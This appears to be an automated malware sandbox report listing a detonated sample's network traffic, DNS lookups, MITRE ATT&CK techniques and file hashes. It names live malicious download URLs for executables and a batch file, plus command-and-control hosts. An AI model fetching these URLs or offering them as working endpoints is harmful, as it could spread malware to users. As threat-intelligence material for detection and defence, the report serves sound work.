GET http://77.91.68.61/fuza/2.bat

HTTP Response

200
162.33.179.91:80

http

E5C7.exe

1.8MB
25.5kB
1313
381
172.67.143.192:80

http://ji.alie3ksgdd.com/m/ss41.exe

http

6.0kB
316.0kB
126
239

HTTP Request

GET http://ji.alie3ksgdd.com/m/ss41.exe

HTTP Response

200
156.236.72.121:443

https://z.nnnaajjjgc.com/sts/imagd.jpg

tls, http

EF40.exe

52.4kB
1.6MB
1129
1128

HTTP Request

GET https://z.nnnaajjjgc.com/sts/imagd.jpg

HTTP Response

200
185.215.113.25:10195

E74F.exe

1.8MB
24.6kB
1304
451
104.26.13.31:443

https://api.ip.sb/ip

tls, http

E5C7.exe

704 B
3.8kB
8
7

HTTP Request

GET https://api.ip.sb/ip

HTTP Response

200
154.221.26.108:80

http://app.nnnaajjjgc.com/check/?sid=339808&key=83365f6912b44575f8e7710c60b65829

http

EF40.exe

2.1kB
1.7kB
15
15

HTTP Request

GET http://app.nnnaajjjgc.com/check/safe

HTTP Response

200

HTTP Request

POST http://app.nnnaajjjgc.com/check/?sid=339804&key=9f2b9058addb86a004980553a09f05de

HTTP Response

200

HTTP Request

GET http://app.nnnaajjjgc.com/check/safe

HTTP Response

200

HTTP Request

POST http://app.nnnaajjjgc.com/check/?sid=339808&key=83365f6912b44575f8e7710c60b65829

HTTP Response

200
142.250.179.141:443

https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AYZoVhel2IOFstnzZBWuLx6rqjTm6mRC6t7PL5-k3BEI8hK8eaXqj3KTwQRYDdOsOfkNtopk8i0Tvw&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-435455321%3A1695001685950698&theme=glif

tls, http2

MicrosoftEdgeCP.exe

6.8kB
120.5kB
116
112

HTTP Request

GET https://accounts.google.com/

HTTP Response

302

HTTP Request

GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F

HTTP Response

302

HTTP Request

GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhf1sYd6miUBh3c50IsdOHhKCWljnPDNOWMTdHn2rr010GUjhSPOCEEC4Wg7Vek7FmZ5IBO2AQ

HTTP Response

302

HTTP Request

GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AYZoVhel2IOFstnzZBWuLx6rqjTm6mRC6t7PL5-k3BEI8hK8eaXqj3KTwQRYDdOsOfkNtopk8i0Tvw&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-435455321%3A1695001685950698&theme=glif

HTTP Response

200
142.250.179.141:443

accounts.google.com

tls, http2

MicrosoftEdgeCP.exe

1.1kB
5.1kB
14
10
157.240.196.35:443

https://www.facebook.com/ajax/bz?__a=1&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zE5W0PU1mUdEG0hi0Lo6-0iq0NE&__hs=19618.BP%3ADEFAULT.2.0..0.0&__hsi=7279976805270566567&__jssesw=438&__req=4&__rev=1008687718&__s=%3A%3Asxc73s&__spin_b=trunk&__spin_r=1008687718&__spin_t=1695001685&__user=0&dpr=1&jazoest=2994&lsd=AVri8uzbNi0

tls, http2

MicrosoftEdgeCP.exe

37.9kB
334.8kB
297
271

HTTP Request

GET https://www.facebook.com/login

HTTP Response

200

HTTP Request

GET https://www.facebook.com/images/cookies/cookie_info_card_image_1.png

HTTP Request

GET https://www.facebook.com/images/cookies/cookie_info_card_image_2.png

HTTP Request

GET https://www.facebook.com/images/cookies/cookie_info_card_image_3.png

HTTP Request

GET https://www.facebook.com/images/cookies/cookie_info_card_image_4.png

HTTP Request

GET https://www.facebook.com/images/cookies/cookie_info_popup_image_1.png

HTTP Request

GET https://www.facebook.com/images/cookies/cookie_info_popup_image_2.png

HTTP Request

GET https://www.facebook.com/images/cookies/cookie_info_popup_image_3.png

HTTP Request

GET https://www.facebook.com/images/cookies/cookie_info_popup_image_4.png

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

POST https://www.facebook.com/ajax/bz?__a=1&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zE5W0PU1mUdEG0hi0Lo6-0iq0NE&__hs=19618.BP%3ADEFAULT.2.0..0.0&__hsi=7279976805270566567&__jssesw=438&__req=1&__rev=1008687718&__s=%3A%3Asxc73s&__spin_b=trunk&__spin_r=1008687718&__spin_t=1695001685&__user=0&dpr=1&jazoest=2994&lsd=AVri8uzbNi0

HTTP Response

200

HTTP Request

POST https://www.facebook.com/ajax/bz?__a=1&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zE5W0PU1mUdEG0hi0Lo6-0iq0NE&__hs=19618.BP%3ADEFAULT.2.0..0.0&__hsi=7279976805270566567&__jssesw=438&__req=2&__rev=1008687718&__s=%3A%3Asxc73s&__spin_b=trunk&__spin_r=1008687718&__spin_t=1695001685&__user=0&dpr=1&jazoest=2994&lsd=AVri8uzbNi0

HTTP Response

200

HTTP Request

POST https://www.facebook.com/ajax/bz?__a=1&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zE5W0PU1mUdEG0hi0Lo6-0iq0NE&__hs=19618.BP%3ADEFAULT.2.0..0.0&__hsi=7279976805270566567&__jssesw=438&__req=3&__rev=1008687718&__s=%3A%3Asxc73s&__spin_b=trunk&__spin_r=1008687718&__spin_t=1695001685&__user=0&dpr=1&jazoest=2994&lsd=AVri8uzbNi0

HTTP Response

200

HTTP Request

POST https://www.facebook.com/ajax/bz?__a=1&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zE5W0PU1mUdEG0hi0Lo6-0iq0NE&__hs=19618.BP%3ADEFAULT.2.0..0.0&__hsi=7279976805270566567&__jssesw=438&__req=4&__rev=1008687718&__s=%3A%3Asxc73s&__spin_b=trunk&__spin_r=1008687718&__spin_t=1695001685&__user=0&dpr=1&jazoest=2994&lsd=AVri8uzbNi0

HTTP Response

200
157.240.196.35:443

www.facebook.com

tls, http2

MicrosoftEdgeCP.exe

994 B
3.7kB
12
9
157.240.196.15:443

https://static.xx.fbcdn.net/rsrc.php/v3/yQ/r/iLrdFWqEA3q.js?_nc_x=Ij3Wp8lg5Kz

tls, http2

MicrosoftEdgeCP.exe

25.1kB
423.5kB
446
398

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0,cross/RspwE1UYLwr.css?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/y9/l/0,cross/9S8tw-NLOwI.css?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yH/l/0,cross/bIbKORaTR8F.css?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yS/l/0,cross/kuYDQivR59P.css?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yI/l/0,cross/N3CLkSu0qgr.css?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yN/l/0,cross/OgJlGIFQEJK.css?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yB/l/0,cross/foC4gVUEQiA.css?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0,cross/pOrYOEqdvUC.css?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yc/l/0,cross/1FPNULrhhBJ.css?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yV/l/0,cross/_bzWjvAFjKO.css?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yy/r/qQ223CD1LSq.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/y4/r/-s5MVAFOSXl.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yG/r/hIiX9VG_sU5.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3i7M54/yZ/l/en_US/vabzdxqQxIf.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yh/r/bpW4eEg-2_W.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yf/r/gRKodhy4gQ6.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yV/r/IfGi7h9oJYC.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yH/l/0,cross/q0FRCvT5NF9.css?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yU/r/O7nelmd9XSI.png

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yB/r/Y0L6f5sxdIV.png

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yu/r/EBMAeYuhJHU.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yC/r/M08arqdo_nN.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/y-/r/LoYlinFj9or.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yZ/r/nDrypLAL0ob.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yn/r/pukjd1lDNzh.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yF/r/p55HfXW__mM.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yA/r/TrP53r_-v-T.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yD/r/rrIiJZftmer.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/y9/r/BTdUGzsTGVy.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yf/r/LgvwffuKmeX.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/ye/r/8dQyU2JZSAY.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/ym/r/UhsarKlkZ3v.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/ys/r/bYk4VlHfuzw.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yJ/r/iSgtY1vM8wW.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3il8Q4/yR/l/en_US/e7GKY53u0xt.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3iLl54/y_/l/en_US/H21EtDFy9Mr.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yD/r/Z48vtSCIBTI.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yE/r/j3BMmuon6xg.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yk/r/82PAamYR-V3.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yi/r/Hy3nXo0ShbY.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/_tJ17sGyxOX.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yE/r/dZPMFj3nPTC.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3iqES4/ys/l/en_US/vk9ztfbh-nf.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yQ/r/iLrdFWqEA3q.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200
157.240.196.15:443

static.xx.fbcdn.net

tls, http2

MicrosoftEdgeCP.exe

997 B
3.7kB
12
9
157.240.196.15:443

static.xx.fbcdn.net

tls, http2

MicrosoftEdgeCP.exe

997 B
3.7kB
12
9
157.240.196.15:443

static.xx.fbcdn.net

tls, http2

MicrosoftEdgeCP.exe

997 B
3.7kB
12
9
157.240.196.15:443

static.xx.fbcdn.net

tls, http2

MicrosoftEdgeCP.exe

997 B
3.7kB
12
9
157.240.196.15:443

static.xx.fbcdn.net

tls, http2

MicrosoftEdgeCP.exe

997 B
3.7kB
12
9
157.240.196.35:443

facebook.com

tls, http2

MicrosoftEdgeCP.exe

990 B
3.7kB
12
9
157.240.196.35:443

https://facebook.com/security/hsts-pixel.gif?c=3.2

tls, http2

MicrosoftEdgeCP.exe

1.3kB
4.1kB
14
9

HTTP Request

GET https://facebook.com/security/hsts-pixel.gif?c=3.2

HTTP Response

302
157.240.196.35:443

fbcdn.net

tls, http2

MicrosoftEdgeCP.exe

987 B
4.0kB
12
9
157.240.196.35:443

https://fbcdn.net/security/hsts-pixel.gif?c=2

tls, http2

MicrosoftEdgeCP.exe

1.4kB
4.4kB
15
10

HTTP Request

GET https://fbcdn.net/security/hsts-pixel.gif?c=2

HTTP Response

302
157.240.196.35:443

https://fbsbx.com/security/hsts-pixel.gif

tls, http2

MicrosoftEdgeCP.exe

1.4kB
5.1kB
15
11

HTTP Request

GET https://fbsbx.com/security/hsts-pixel.gif

HTTP Response

200
157.240.196.35:443

fbsbx.com

tls, http2

MicrosoftEdgeCP.exe

991 B
4.0kB
12
9
157.240.196.15:443

https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico

tls, http2

MicrosoftEdge.exe

1.4kB
5.7kB
16
12

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico

HTTP Response

200
157.240.196.15:443

static.xx.fbcdn.net

tls, http2

MicrosoftEdge.exe

987 B
3.7kB
12
9
20.189.173.20:443

https://watson.telemetry.microsoft.com/Telemetry.Request

tls, http

8.2kB
5.9kB
14
11

HTTP Request

POST https://watson.telemetry.microsoft.com/Telemetry.Request

HTTP Response

200
142.250.179.141:443

accounts.google.com

tls, http2

MicrosoftEdgeCP.exe

1.0kB
5.1kB
13
10
142.250.179.141:443

https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AYZoVhel2IOFstnzZBWuLx6rqjTm6mRC6t7PL5-k3BEI8hK8eaXqj3KTwQRYDdOsOfkNtopk8i0Tvw&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-435455321%3A1695001685950698&theme=glif

tls, http2

MicrosoftEdgeCP.exe

5.5kB
117.2kB
99
96

HTTP Request

GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AYZoVhel2IOFstnzZBWuLx6rqjTm6mRC6t7PL5-k3BEI8hK8eaXqj3KTwQRYDdOsOfkNtopk8i0Tvw&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-435455321%3A1695001685950698&theme=glif

HTTP Response

200
20.189.173.20:443

https://watson.telemetry.microsoft.com/Telemetry.Request

tls, http

6.7kB
5.9kB
13
10

HTTP Request

POST https://watson.telemetry.microsoft.com/Telemetry.Request

HTTP Response

200
77.91.124.82:19071

AppLaunch.exe

156 B
3
77.91.124.82:19071

AppLaunch.exe

156 B
3

8.8.8.8:53

135.121.18.2.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

135.121.18.2.in-addr.arpa
8.8.8.8:53

0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa

dns

118 B
182 B
1
1

DNS Request

0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa
8.8.8.8:53

52.68.91.77.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

52.68.91.77.in-addr.arpa
8.8.8.8:53

78.68.91.77.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

78.68.91.77.in-addr.arpa
8.8.8.8:53

29.68.91.77.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

29.68.91.77.in-addr.arpa
8.8.8.8:53

13.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

13.227.111.52.in-addr.arpa
8.8.8.8:53

61.68.91.77.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

61.68.91.77.in-addr.arpa
8.8.8.8:53

ji.alie3ksgdd.com

dns

63 B
95 B
1
1

DNS Request

ji.alie3ksgdd.com

DNS Response

172.67.143.192

104.21.54.252
8.8.8.8:53

91.179.33.162.in-addr.arpa

dns

72 B
127 B
1
1

DNS Request

91.179.33.162.in-addr.arpa
8.8.8.8:53

192.143.67.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

192.143.67.172.in-addr.arpa
8.8.8.8:53

z.nnnaajjjgc.com

dns

EF40.exe

62 B
78 B
1
1

DNS Request

z.nnnaajjjgc.com

DNS Response

156.236.72.121
8.8.8.8:53

121.72.236.156.in-addr.arpa

dns

73 B
127 B
1
1

DNS Request

121.72.236.156.in-addr.arpa
8.8.8.8:53

api.ip.sb

dns

E5C7.exe

55 B
145 B
1
1

DNS Request

api.ip.sb

DNS Response

104.26.13.31

172.67.75.172

104.26.12.31
8.8.8.8:53

25.113.215.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

25.113.215.185.in-addr.arpa
8.8.8.8:53

8.3.197.209.in-addr.arpa

dns

70 B
111 B
1
1

DNS Request

8.3.197.209.in-addr.arpa
8.8.8.8:53

147.174.42.23.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

147.174.42.23.in-addr.arpa
8.8.8.8:53

133.121.18.2.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

133.121.18.2.in-addr.arpa
8.8.8.8:53

31.13.26.104.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

31.13.26.104.in-addr.arpa
8.8.8.8:53

www.facebook.com

dns

MicrosoftEdgeCP.exe

62 B
107 B
1
1

DNS Request

www.facebook.com

DNS Response

157.240.247.35
8.8.8.8:53

app.nnnaajjjgc.com

dns

EF40.exe

64 B
80 B
1
1

DNS Request

app.nnnaajjjgc.com

DNS Response

154.221.26.108
8.8.8.8:53

www.facebook.com

dns

MicrosoftEdgeCP.exe

62 B
107 B
1
1

DNS Request

www.facebook.com

DNS Response

157.240.201.35
8.8.8.8:53

accounts.google.com

dns

MicrosoftEdgeCP.exe

65 B
81 B
1
1

DNS Request

accounts.google.com

DNS Response

142.250.179.141
8.8.8.8:53

www.facebook.com

dns

MicrosoftEdgeCP.exe

62 B
107 B
1
1

DNS Request

www.facebook.com

DNS Response

157.240.196.35
8.8.8.8:53

108.26.221.154.in-addr.arpa

dns

73 B
134 B
1
1

DNS Request

108.26.221.154.in-addr.arpa
8.8.8.8:53

141.179.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

141.179.250.142.in-addr.arpa
8.8.8.8:53

35.196.240.157.in-addr.arpa

dns

73 B
126 B
1
1

DNS Request

35.196.240.157.in-addr.arpa
8.8.8.8:53

35.36.251.142.in-addr.arpa

dns

72 B
110 B
1
1

DNS Request

35.36.251.142.in-addr.arpa
8.8.8.8:53

static.xx.fbcdn.net

dns

MicrosoftEdge.exe

65 B
104 B
1
1

DNS Request

static.xx.fbcdn.net

DNS Response

157.240.196.15
8.8.8.8:53

facebook.com

dns

MicrosoftEdgeCP.exe

58 B
74 B
1
1

DNS Request

facebook.com

DNS Response

157.240.196.35
8.8.8.8:53

fbcdn.net

dns

MicrosoftEdgeCP.exe

55 B
71 B
1
1

DNS Request

fbcdn.net

DNS Response

157.240.196.35
8.8.8.8:53

15.196.240.157.in-addr.arpa

dns

73 B
117 B
1
1

DNS Request

15.196.240.157.in-addr.arpa
8.8.8.8:53

fbsbx.com

dns

MicrosoftEdgeCP.exe

55 B
71 B
1
1

DNS Request

fbsbx.com

DNS Response

157.240.196.35
8.8.8.8:53

22.160.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

22.160.190.20.in-addr.arpa
8.8.8.8:53

watson.telemetry.microsoft.com

dns

76 B
204 B
1
1

DNS Request

watson.telemetry.microsoft.com

DNS Response

20.189.173.20
8.8.8.8:53

20.173.189.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

20.173.189.20.in-addr.arpa
8.8.8.8:53

195.179.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

195.179.250.142.in-addr.arpa
8.8.8.8:53

200.81.21.72.in-addr.arpa

dns

71 B
142 B
1
1

DNS Request

200.81.21.72.in-addr.arpa
8.8.8.8:53

84.65.42.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

84.65.42.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

Filesize
226B

MD5
957779c42144282d8cd83192b8fbc7cf

SHA1
de83d08d2cca06b9ff3d1ef239d6b60b705d25fe

SHA256
0d7ca7ba65e2b465e4878e324ceab8f8981f5ec06dcf5bc32559a4467a9c7d51

SHA512
f1549c61b4f2906d13b2aabb74772c2bc826cd42373d7bb6c48cbb125d5aa2ec17617e6b5e67e8aae3bb5790cc831cdba48a45008ed01df4fba8be448cce39fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\96DKDNLK\edgecompatviewlist[1].xml

Filesize
74KB

MD5
d4fc49dc14f63895d997fa4940f24378

SHA1
3efb1437a7c5e46034147cbbc8db017c69d02c31

SHA256
853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1

SHA512
cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\K03V72P4\B8BxsscfVBr[1].ico

Filesize
1KB

MD5
e508eca3eafcc1fc2d7f19bafb29e06b

SHA1
a62fc3c2a027870d99aedc241e7d5babba9a891f

SHA256
e6d1d77403cd9f14fd2377d07e84350cfe768e3353e402bf42ebdc8593a58c9a

SHA512
49e3f31fd73e52ba274db9c7d306cc188e09c3ae683827f420fbb17534d197a503460e7ec2f1af46065f8d0b33f37400659bfa2ae165e502f97a8150e184a38c

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\IKZP82PF.cookie

Filesize
130B

MD5
211b8c1bf0b29e5b2f1eea2b11a8a0ac

SHA1
8b5a61014134d25161d23830c72487289cc22a70

SHA256
fd487f462781f8d552f62da7c08d172a365a8a2936df19c04c6a5de5a9352ae1

SHA512
83ab6a3d812875aec9d2cfecdd7f33c9a27e631d926663163d99c4e3bbc0c372e4cf9cf6ebf2d82629fe0cdb5dbbdffa4c36bfd0a5e3b67b3184a6ddc36f56c6

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
5d13c93c1ffbc325327f9848b8346003

SHA1
0a2678ebe23dfeea13cb8f529f55ac0cac436054

SHA256
54836d31af906348184544664235fc815918029551f45ac159369ebc3aa570c4

SHA512
7688770276507d81af8b683753af694ece3eca88285022d544da6c1647d11ba69f6f3312f42f05115ac2b7bd40b5c6c14093e99fa31db60a7d864a6c1c1130ed

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_BA0BAB2D4C396325C2233CA4C6557724

Filesize
472B

MD5
149a7377ce505162af15127c384d5e3b

SHA1
f4bf765455a03741b3c401204af7aadc8356e4a4

SHA256
f6731d465327021f3b3ced0bb1087faf90bf1d7b7619edb8b94dbf3f80fd3f43

SHA512
06ea8e0a9348ff73c0ca08ffde9ca5747697f80b61ae5f83e28c8ad54320398b9e9bc3a3d892921c9beb6ce55ebf7c910dbcd99bfec178b710f5e6a55fca522d

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA

Filesize
724B

MD5
aa62f8ce77e072c8160c71b5df3099b0

SHA1
06b8c07db93694a3fe73a4276283fabb0e20ac38

SHA256
3eb4927c4d9097dc924fcde21b56d01d5d1ef61b7d22bfb6786e3b546b33e176

SHA512
71724e837286c5f0eb2ee4ad01ac0304d4c7597bb2d46169c342821b0da04d8597491bd27ef80e817bc77031cd29d2182ccc82ef8ea3860696875f89427c8e0a

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
a23e0b3d2773c39c6cf03931f93b8f89

SHA1
d6f0c3b3a9a26319e1e004afb2b6f49af5f74a08

SHA256
6c7b4cef0967a356839d86bf0659bca5f8783e3370bdd4c1dc91c730489f0b3c

SHA512
6f30c3285bbe64643e2f37100496f34807d37537a28f354b382bfc55b094b0a31e491181afbb8342808066d73587c797cbf4e2b4f89a8f054e7078c76e666754

Download Submit
